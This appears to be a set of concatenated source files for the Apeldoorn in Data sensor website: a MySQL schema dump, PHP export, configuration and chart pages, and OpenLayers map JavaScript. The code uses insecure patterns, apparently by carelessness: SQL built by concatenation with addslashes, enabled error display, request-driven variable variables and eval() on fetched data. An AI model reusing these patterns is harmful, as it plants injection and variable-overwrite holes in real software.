`Sf11` bigint(20) NOT NULL DEFAULT '0',
`Sf12` bigint(20) NOT NULL DEFAULT '0',
`Lastmessage` datetime NOT NULL,
`Packets` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=160 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `point`
--
DROP TABLE IF EXISTS `point`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `point` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Name` text NOT NULL,
`Unitid` bigint(20) NOT NULL,
`Nodeid` bigint(20) NOT NULL,
`Priority` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=405 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `ttngateways`
--
DROP TABLE IF EXISTS `ttngateways`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `ttngateways` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gwid` text,
`Lastseen` datetime DEFAULT NULL,
`Latitude` decimal(10,6) DEFAULT NULL,
`Longitude` decimal(10,6) DEFAULT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Gwid_UNIQUE` (`Gwid`(20))
) ENGINE=MyISAM AUTO_INCREMENT=32128 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `unit`
--
DROP TABLE IF EXISTS `unit`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `unit` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Unit` text,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2019-10-09 20:25:58
<file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
header("Content-type: text/csv");
header('Content-Disposition: attachment; filename='.date("YmdHis").'_'.$_REQUEST['id'].'_aidexport.csv');
header("Pragma: no-cache");
header("Expires: 0");
$limit = 1000;
if(isset($_REQUEST['limit']) && is_numeric($_REQUEST['limit'])) {
$limit = $_REQUEST['limit'];
if($limit > 50000){
$limit = 50000;
}
}
include('db.php');
if(!isset($_REQUEST['admin'])) {
if(in_array($_REQUEST['id'], $GLOBALS['nodefilter'])) {
die('oops, deze pagina is niet beschikbaar');
}
}
$sql = 'SELECT * FROM node WHERE id = '.addslashes($_REQUEST['id']);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
//var_dump($row);
$arrPoints = null;
$sql1 = 'SELECT point.id AS \'Id\', point.name AS \'Name\', unit.Unit AS \'Unit\' FROM point, unit WHERE point.Nodeid = '.addslashes($row['Id']).' AND point.Unitid = unit.Id';
//echo $sql;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$arrPoints[] = array('id' => $row1['Id'], 'name' => $row1['Name'], 'unit' => $row1['Unit']);
}
$limit = $limit * count($arrPoints);
if($arrPoints != null) {
$sql2 = '';
foreach($arrPoints as $point) {
if($sql2 != '') {
$sql2 .= ' UNION ';
}
$sql2 .= 'SELECT \''.$point['id'].'\' AS \'Tagid\', Moment, Tagvalue FROM measurement'.$point['id'].'';
}
$sql2 .= ' ORDER BY Moment DESC, Tagid ASC LIMIT '.addslashes($limit);
//echo $sql2;
$lastData = null;
$i = -1;
$result2 = mysqlquery($sql2);
while ($row2 = mysqli_fetch_array($result2))
{
//var_dump($row2);
if($lastData != $row2['Moment']) {
$i++;
$lastData = $row2['Moment'];
}
$data[$i]['Moment'] = $row2['Moment'];
$data[$i][$row2['Tagid']] = $row2['Tagvalue'];
}
} else {
echo 'Geen data beschikbaar';
}
//var_dump($data);
echo 'Moment';
//var_dump($arrPoints);
foreach($arrPoints as $point) {
//var_dump($point);
echo ';'.$point['name'].' ['.$point['unit'].']';
}
echo ';'."\n";
foreach($data as $dataMoment) {
echo $dataMoment['Moment'];
foreach($arrPoints as $point) {
echo ';';
if(array_key_exists($point['id'], $dataMoment)) {
echo str_replace('000', '', str_replace('0000', '', str_replace('.00000', '', $dataMoment[$point['id']])));
} else {
echo '';
}
}
echo ';'."\n";
}
}
?><file_sep><!-- Fixed navbar -->
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="https://apeldoornindata.nl">Apeldoorn in Data</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<?php
echo '<li><a href="https://apeldoornindata.nl">Home</a></li>'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'map.php') !== false ) {
echo ' class="active"';
}
echo '><a href="https://apeldoornindata.nl/map.php">Kaart</a></li>'."\n";
echo '<li><a href="https://apeldoornindata.nl/index.php/category/apeldoorn-in-data/">Blog</a></li>'."\n";
echo '<li class="dropdown';
if(strpos($_SERVER['REQUEST_URI'], 'raw.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'gateway.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'nodeoverview.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'node.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'chart') !== false ) {
echo ' active';
}
echo '">'."\n";
echo '<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Details<span class="caret"></span></a>'."\n";
echo '<ul class="dropdown-menu">'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'raw.php') !== false ) {
echo ' class="active"';
}
echo '><a href="'.$GLOBALS['urldata'].'raw.php">Ruwe data</a></li>'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'gateway.php') !== false ) {
echo ' class="active"';
}
echo '><a href="'.$GLOBALS['urldata'].'gateway.php">Gateways</a></li>'."\n";
echo '<li';
if(strpos($_SERVER['REQUEST_URI'], 'node.php') !== false
|| strpos($_SERVER['REQUEST_URI'], 'nodeoverview.php') !== false ) {
echo ' class="active"';
}
echo '><a href="'.$GLOBALS['urldata'].'nodeoverview.php">Nodes</a></li>'."\n";
echo '<li class="';
if(strpos($_SERVER['REQUEST_URI'], 'chart') !== false ) {
echo 'active ';
}
echo ' dropdown-submenu"><a href="#" class="dropdown-toggle" data-toggle="dropdown">Grafieken</a>'."\n";
echo '<ul class="dropdown-menu">
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=01') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=01">Temperatuur</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=2') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=2">Relatieve vochtigheid</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=3') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=3">Luchtdruk</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=4') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=4">Lichtintensiteit</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=5') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=5">Batterij</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=6') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=6">Radio actieve straling</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=7') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=7">Fijnstof</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=8') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=8">Fijnstof - SDS011 - PM2.5</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=9') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=9">Fijnstof - SDS011 - PM10</a></li>
<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=10') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=10">Fijnstof - PM2.5 & PM10</a></li>'."\n";
echo '<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=11') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=11">Fijnstof - PM2.5 2018</a></li>'."\n";
echo '<li ';
if(strpos($_SERVER['REQUEST_URI'], 'chartcombined.php?id=12') !== false ) {
echo 'class="active" ';
}
echo '><a href="'.$GLOBALS['urldata'].'chartcombined.php?id=12">Fijnstof - PM10 2018</a></li>'."\n";
echo '
</ul>'."\n";
echo '</li></ul>'."\n";
echo '</li>'."\n";
echo '<li><a href="'.$GLOBALS['url'].'index.php/links/">Links</a></li>'."\n";
echo '</ul>'."\n";
?>
<ul class="nav navbar-nav navbar-right">
<li><a href="<?php echo $GLOBALS['url']; ?>#contact">Contact</a></li>
</ul>
</div><!--/.nav-collapse -->
</div>
</nav>
<file_sep><?php
ob_start();
date_default_timezone_set('Europe/Amsterdam');
header('Content-Type: text/html; charset=iso-8859-1');
// loadtime
if(!function_exists("getmicrotime"))
{
function getmicrotime() {
list($usec, $sec) = explode(" ",microtime());
return ((float)$usec + (float)$sec);
}
}
global $footerJS;
global $time_start;
$time_start = getmicrotime();
$DBhost = "localhost";
$Dbnaam = "";
$DBuser = "";
$DBpass = "";
$mysqli = new mysqli($DBhost, $DBuser, $DBpass, $Dbnaam);
if ($mysqli->connect_errno) {
printf("Connect failed: %s\n", $mysqli->connect_error);
exit();
}
$GLOBALS['mysqli'] = $mysqli;
// Global vars
$GLOBALS['url'] = 'https://apeldoornindata.nl/';
$GLOBALS['urlimg'] = 'https://apeldoornindata.nl/images/';
$GLOBALS['urlstyle'] = 'https://apeldoornindata.nl/style/';
$GLOBALS['urljs'] = 'https://apeldoornindata.nl/js/';
$GLOBALS['urldata'] = 'https://apeldoornindata.nl/data/';
$GLOBALS['nodefilter'] = array(78, 79, 81, 82, 83, 84, 87, 120);
if(!function_exists("isequal"))
{
function isequal($variable, $value)
{
if(isset($variable))
{
if($variable == $value)
return true;
else
return false;
}
else
{
if($value == null)
return true;
else
return false;
}
}
}
if(!function_exists("vardump"))
{
function vardump($variable)
{
echo '<pre>';
var_dump($variable);
echo '</pre>';
}
}
if(session_id() == '')
{
@session_start();
}
// begin url met /
if(isset($PATH_INFO))
{
$vardata = explode('/', $PATH_INFO);
$num_param = count($vardata);
if($num_param % 2 == 0)
{
$vardata[] = '';
$num_param++;
}
for($i = 1; $i < $num_param; $i += 2)
{
$$vardata[$i] = $vardata[$i+1];
}
}
// eind url met /
/*if(!empty($_SERVER['PATH_INFO']))
{
$_aGET = substr($_SERVER['PATH_INFO'], 1);
$_aGET = explode('/', $_aGET);
}*/
if(!empty($_SERVER['REQUEST_URI']))
{
$_aGET = explode('/', str_replace(str_replace('.php', '', $_SERVER["SCRIPT_NAME"]).'/', '', $_SERVER["REQUEST_URI"]));
}
function mysqlquery($sql)
{
if(!isset($mysqli)) {
$mysqli = new mysqli($GLOBALS['DBhost'], $GLOBALS['DBuser'], $GLOBALS['DBpass'], $GLOBALS['Dbnaam']);
if ($mysqli->connect_errno) {
printf("Connect failed: %s\n", $mysqli->connect_error);
exit();
}
$GLOBALS['mysqli'] = $mysqli;
}
global $sqlstats;
$starttijd = getmicrotime();
$result = $GLOBALS['mysqli']->query($sql);
$stoptijd = getmicrotime();
$sqlstats['totaltime'] = $sqlstats['totaltime']+($stoptijd-$starttijd);
if(!isset($sqlstats['totalquerys']))
{
$sqlstats['totalquerys']=0;
}
$sqlstats['totalquerys'] = $sqlstats['totalquerys']+1;
$queryDuration = ($stoptijd-$starttijd);
$queryDuration = str_pad($queryDuration, 19, '0', STR_PAD_LEFT);
$logString = str_replace("\n", '', str_replace("\r", '', str_replace("\t", '', str_replace(" ", ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', $sql))))))))))))));
$logString = $queryDuration.' - '.str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', str_replace(' ', ' ', $logString))));
if($result)
{
//logInfo($logString);
}
else
{
logError('Mysqlquery - No Result: '.$logString);
}
//$e = new Exception();
//$trace = $e->getTrace();
//$sqlstats[] = array ('tijd' => $stoptijd-$starttijd, 'query' => $sql, 'caller' => $trace[1]);
return $result;
}
mysqlquery('SET NAMES UTF8');
function loadingtime($time_start,$comment)
{
global $loadingtime, $arrLoadintime;
$tijdnu = getmicrotime();
$arrLoadintime[] = array ('comment' => $comment, 'parttime' => $tijdnu-$loadingtime, 'totaltime' => $tijdnu-$time_start);
$loadingtime = $tijdnu;
return $loadingtime;
}
function logError($msg)
{
//logToFile($_SERVER["DOCUMENT_ROOT"]."/log/".date("Ymd", time())."_error.log", $msg);
}
function logInfo($msg)
{
if($_SERVER["DOCUMENT_ROOT"] != '')
{
logToFile($_SERVER["DOCUMENT_ROOT"]."/log/".date("Ymd", time())."_info.log", $msg);
}
else
{
logToFile('/home/openpanel-admin/sites/domotica.wiredhouse.nl/public_html'."/log/".date("Ymd", time())."_info.log", $msg);
}
}
function logDebug($msg)
{
//logToFile($_SERVER["DOCUMENT_ROOT"]."/log/".date("Ymd", time())."_debug.log", $msg);
}
function logToFile($filename, $msg)
{
// open file
$fd = fopen($filename, "a");
// append date/time to message
$str = "[" . date("Y/m/d H:i:s", time()) . "] " . $msg;
// write string
fwrite($fd, $str . "\n");
// close file
fclose($fd);
}
function errorhandler($type, $msg, $file, $line)
{
// log all errors
$logtext = "Error - File: ".$file." Line: ".$line." - ";
if(isset($_SERVER['REMOTE_ADDR'])){
$logtext .= $_SERVER['REMOTE_ADDR'];
}
$logtext .= " - ".$msg." (error type ".$type.")";
if(isset($_SERVER['HTTP_REFERER']))
{
$logtext .= ' Refer: '.$_SERVER['HTTP_REFERER'].' ';
}
if(isset($_SERVER['HTTP_USER_AGENT']))
{
$logtext .= ' - User Agent: '.$_SERVER['HTTP_USER_AGENT'];
}
if(isset($_SERVER['REQUEST_URI']))
{
$logtext .= ' - REQUEST_URI: '.$_SERVER["REQUEST_URI"];
}
logError($logtext);
// if fatal error, die()
if ($type == E_USER_ERROR)
{
die($msg);
}
}
function exeptionhandler($exception)
{
// log all errors
$logtext = "Exeption - File: ".$exception->getFile()." - Line: ".$exception->getLine()." - Exeption: ".$exception->getMessage()." - ".$_SERVER['REMOTE_ADDR']."";
if(isset($_SERVER['HTTP_REFERER']))
{
$logtext .= ' Refer: '.$_SERVER['HTTP_REFERER'].' ';
}
if(isset($_SERVER['HTTP_USER_AGENT']))
{
$logtext .= ' - User Agent: '.$_SERVER['HTTP_USER_AGENT'];
}
if(isset($_SERVER['REQUEST_URI']))
{
$logtext .= ' - REQUEST_URI: '.$_SERVER["REQUEST_URI"];
}
logError($logtext);
}
function aasort(&$array, $key)
{
$sorter=array();
$ret=array();
reset($array);
foreach ($array as $ii => $va) {
$sorter[$ii]=$va[$key];
}
asort($sorter);
foreach ($sorter as $ii => $va) {
$ret[$ii]=$array[$ii];
}
$array=$ret;
}
// report all errors
error_reporting(E_ALL);
ini_set('display_errors', '1');
// define custom handler
set_error_handler("errorhandler");
set_exception_handler("exeptionhandler");
//header('Content-Type: text/html; charset=iso-8859-1');
header('Content-Type: text/html; charset=utf-8');
?><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$daysback = 0;
if($_REQUEST['daysback'] != null) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = abs(addslashes($_REQUEST['daysback']));
$startDay = $daysback*-1 - 1;
}
}
include('db.php');
if($_REQUEST['id'] == null) {
echo 'id niet ingegeven';
exit();
}
$points = null;
$multipleAxis = false;
switch($_REQUEST['id']) {
case 1:
$mesurementType = 'Temperatuur';
break;
case 2:
$mesurementType = 'Relative vochtigheid';
break;
case 3:
$mesurementType = 'Luchtdruk';
break;
case 4:
$mesurementType = 'Lichtintensiteit';
break;
case 5:
$mesurementType = 'Batterij';
break;
case 6:
$mesurementType = 'Radio actieve straling';
break;
case 7:
$mesurementType = 'Fijnstof';
break;
case 8:
$mesurementType = 'PM2.5';
break;
case 9:
$mesurementType = 'PM10';
break;
case 10:
$mesurementType = 'PM2.5 & PM10';
break;
case 11:
$mesurementType = 'PM2.5 2018';
break;
case 12:
$mesurementType = 'PM10 2018';
break;
default:
echo 'Onbekend type.';
exit;
break;
}
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE node.id = point.Nodeid AND point.Name LIKE \'%'.$mesurementType.'%\' AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
if($_REQUEST['id'] == 10) {
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)) OR (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY))';
//echo $sql;
}
if($_REQUEST['id'] == 11) {
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
if($_REQUEST['id'] == 12) {
$sql = 'SELECT node.Name as \'NodeName\', point.Name AS \'PointName\' FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = $row['NodeName'].' - '.$row['PointName'];
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<!--Load the AJAX API-->
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=<?php echo addslashes($_REQUEST['id']) ?>&type=combined&daysback=<?php echo $daysback; ?>",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 80, right: 50, top:10, bottom: 50},
legend: {position: 'none'},
vAxis: {format:'#.#' <?php if($_REQUEST['id'] == 6) {
echo ',
viewWindow: {
max:250,
min:0
}';
}
if($_REQUEST['id'] == 8) {
echo ',
viewWindow: {
max:200,
min:0
}';
}
if($_REQUEST['id'] == 9) {
echo ',
viewWindow: {
max:200,
min:0
}';
}
if($_REQUEST['id'] == 10) {
echo ',
viewWindow: {
max:200,
min:0
}';
}
if($_REQUEST['id'] == 11) {
echo ',
viewWindow: {
max:1500,
min:0
}';
}
if($_REQUEST['id'] == 12) {
echo ',
viewWindow: {
max:1500,
min:0
}';
}
?>
},
hAxis: {
format: 'HH:mm:ss',
},
height: 600
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
<?php
foreach($points as $point) {
echo 'data.addColumn(\'number\', \''.$point.'\');'."\n";
}
?>
data.insertRows(0, eval(jsonData));
var date_formatter = new google.visualization.DateFormat({
pattern: "dd/MM/yyyy HH:mm:ss"
});
date_formatter.format(data, 0);
chart.draw(data, options);
}
</script>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
echo "\n";
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
echo '<h1>'.$mesurementType.'</h1>'."\n";
?>
<!--Div that will hold the pie chart-->
<div id="chart_div" style="width: 90%; height: 90%;"></div>
<?php
echo '<br/><a href="'.$GLOBALS['urldata'].'chartcombined.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback+1).'"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-left"></button></a><a href="'.$GLOBALS['urldata'].'chartcombined.php?id='.$_REQUEST['id'].'"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-stop"></button></a>';
if($daysback > 0) {
echo '<a href="'.$GLOBALS['urldata'].'chartcombined.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback-1).'"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-right"></button></a><br/><br/>'."\n";
} else {
echo '<button type="button" class="btn btn-default" disabled="true"><span class="glyphicon glyphicon-chevron-right"></button><br/><br/>'."\n";
}
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
<script type="text/javascript">
//create trigger to resizeEnd event
$(window).resize(function() {
if(this.resizeTO) clearTimeout(this.resizeTO);
this.resizeTO = setTimeout(function() {
$(this).trigger('resizeEnd');
}, 500);
});
//redraw graph when window resize is completed
$(window).on('resizeEnd', function() {
drawChart(data);
});
</script>
</body>
</html><file_sep>function init() {
proj4.defs("EPSG:28992","+proj=sterea +lat_0=52.15616055555555 +lon_0=5.38763888888889 +k=0.9999079 +x_0=155022 +y_0=463015 +ellps=bessel +towgs84=565.417,50.3319,465.552,-0.398957,0.343988,-1.8774,4.0725 +units=m +no_defs");
var projection = new ol.proj.Projection('EPSG:28992');
var projectionExtent = [-285401.92,22598.08,595401.92,903402.0];
var size = ol.extent.getWidth(projectionExtent) / 256;
// generate resolutions and matrixIds arrays for PDOK WMTS
var resolutions = [3440.64, 1720.32, 860.16, 430.08, 215.04, 107.52, 53.76, 26.88, 13.44, 6.72, 3.36, 1.68, 0.84, 0.42]
var matrixIds = new Array(14);
for (var z = 0; z < 15; ++z) matrixIds[z] = 'EPSG:28992:' + z;
// get last hour sensor data
var sensorHourDataSource = new ol.source.GeoJSON({
url: 'data/sensors_json.php',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992'
});
var sensorHourStyleCache = {};
var sensorHourDataLayer = new ol.layer.Vector({
title: 'sensoren laatste 24 uur',
source: new ol.source.Cluster({
distance: 40,
source: sensorHourDataSource,
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorHourStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorHourStyleCache[size] = style;
}
return style;
}
});
// get all sensor data
var sensorAllDataSource = new ol.source.GeoJSON({
url: 'data/sensors_json.php?select=all',
defaultProjection: 'EPSG:4326',
projection: 'EPSG:28992'
});
var sensorAllStyleCache = {};
var sensorAllDataLayer = new ol.layer.Vector({
visible: false,
title: 'sensoren alles',
source: new ol.source.Cluster({
distance: 40,
source: sensorAllDataSource,
}),
style: function(feature, resolution) {
var size = feature.get('features').length;
var style = sensorAllStyleCache[size];
if (!style) {
var label = '';
if (size>1) label = size.toString();
style = [new ol.style.Style({
image: new ol.style.Icon(({
scale: 0.4,
anchor: [0, 1.0],
anchorXUnits: 'fraction',
anchorYUnits: 'fraction',
opacity: 0.75,
src: 'images/sensor.png'
})),
text: new ol.style.Text({
text: label,
offsetX: 5,
offsetY: -6,
fill: new ol.style.Fill({
color: '#000'
})
})
})];
sensorAllStyleCache[size] = style;
}
return style;
}
});
var url = 'https://geodata1.nationaalgeoregister.nl/luchtfoto/wmts/luchtfoto_png/nltilingschema/';
var tileUrlFunction = function(tileCoord, pixelRatio, projection) {
var zxy = tileCoord;
if (zxy[1] < 0 || zxy[2] < 0) return "";
return url +
zxy[0].toString()+'/'+ zxy[1].toString() +'/'+
((1 << zxy[0]) - zxy[2] - 1).toString() +'.png';
};
luchtfoto = new ol.layer.Tile({
title: 'Luchtfoto',
type: 'base',
visible: false,
source: new ol.source.TileImage({
attributions: [
new ol.Attribution({
html: 'Kaartgegevens: <a href="http://creativecommons.org/licenses/by-nc/3.0/nl/">CC-BY-NC</a> <a href="http://www.pdok.nl">PDOK</a>.'
})
],
projection: 'EPSG:28992',
tileGrid: new ol.tilegrid.TileGrid({
origin: [-285401.92,22598.08],
resolutions: resolutions
}),
tileUrlFunction: tileUrlFunction
}),
});
var topografie = new ol.layer.Tile({
title: 'Topografie',
type: 'base',
visible: true,
source: new ol.source.WMTS({
url: 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/brtachtergrondkaart',
layer: 'brtachtergrondkaart',
// url: 'http://geodata.nationaalgeoregister.nl/tiles/service/wmts/brtachtergrondkaartgrijs',
// layer: 'brtachtergrondkaartgrijs',
attributions: [
new ol.Attribution({
html: 'Kaartgegevens: <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.nl">CC-BY-SA</a> <a href="http://www.osm.org">OSM</a> & <a href="http://www.kadaster.nl">Kadaster</a>.'
})
],
matrixSet: 'EPSG:28992',
format: 'image/png',
tileGrid: new ol.tilegrid.WMTS({
origin: ol.extent.getTopLeft(projectionExtent),
resolutions: resolutions,
matrixIds: matrixIds
})
}),
});
var ahn = new ol.layer.Tile({
title: 'AHN',
type: 'base',
visible: false,
source: new ol.source.WMTS({
url: 'https://geodata.nationaalgeoregister.nl/tiles/service/wmts/ahn2',
layer: 'ahn2_05m_ruw',
// url: 'http://geodata.nationaalgeoregister.nl/tiles/service/wmts/ahn3',
// layer: 'ahn3_05m_dtm',
attributions: [
new ol.Attribution({
html: 'Kaartgegevens: <a href="http://creativecommons.org/publicdomain/zero/1.0/deed.nl">CC-0</a> <a href="www.ahn.nl">AHN</a>.'
})
],
matrixSet: 'EPSG:28992',
format: 'image/png',
tileGrid: new ol.tilegrid.WMTS({
origin: ol.extent.getTopLeft(projectionExtent),
resolutions: resolutions,
matrixIds: matrixIds
})
}),
});
// Create the map
var map = new ol.Map({
target: 'map', // The DOM element that will contains the map
renderer: 'canvas', // Force the renderer to be used
layers: [
new ol.layer.Group({
title: 'Achtergrond',
layers: [
luchtfoto,
// ahn,
topografie
]
}),
new ol.layer.Group({
title: 'Kaartlagen',
layers: [
sensorAllDataLayer,
sensorHourDataLayer
]
})
],
projection: 'EPSG:28992',
view: new ol.View({
// center: ol.extent.getCenter(projectionExtent),
center: ol.proj.transform([5.967979, 52.209711], 'EPSG:4326', 'EPSG:28992'),
zoom: 14
})
});
var layerSwitcher = new ol.control.LayerSwitcher({
tipLabel: 'Legenda'
});
map.addControl(layerSwitcher);
// -- Display information on singleclick --
// Create a popup overlay which will be used to display feature info
var popup = new ol.Overlay.Popup();
map.addOverlay(popup);
// Add an event handler for the map "singleclick" event
map.on('singleclick', function(evt) {
// Hide existing popup and reset it's offset
popup.hide();
popup.setOffset([0, 0]);
// Attempt to find a feature in one of the visible vector layers
// alert(evt.pixel);
var feature = map.forEachFeatureAtPixel(evt.pixel, function(feature, layer) {
// alert(layer);
// alert(feature);
return feature;
});
if (feature != null) {
feature = feature.get('features')[0];
if (feature) {
var coord = feature.getGeometry().getCoordinates();
var props = feature.getProperties();
var info;
if (feature != null) {
info = '<h2>' + feature.o[0].location + '</h2>';
info += '<i>' + feature.o[0].timestamp + '</i><br/>';
var arrayTags = $.map(feature.o, function (value, index) {
return [value];
});
for (index = 0; index < arrayTags.length; ++index) {
if (arrayTags[index].name != undefined && arrayTags[index].value != undefined) {
info += arrayTags[index].name + ': ' + arrayTags[index].value + '<br/>';
}
}
}
// Offset the popup so it points at the middle of the marker not the tip
popup.setOffset([10, -60]);
popup.show(coord, info);
}
}
});
}
var thisPage;
function showPage(url) {
if (url && thisPage!==url) {
thisPage = url;
document.getElementById('textframe').style.visibility = 'visible';
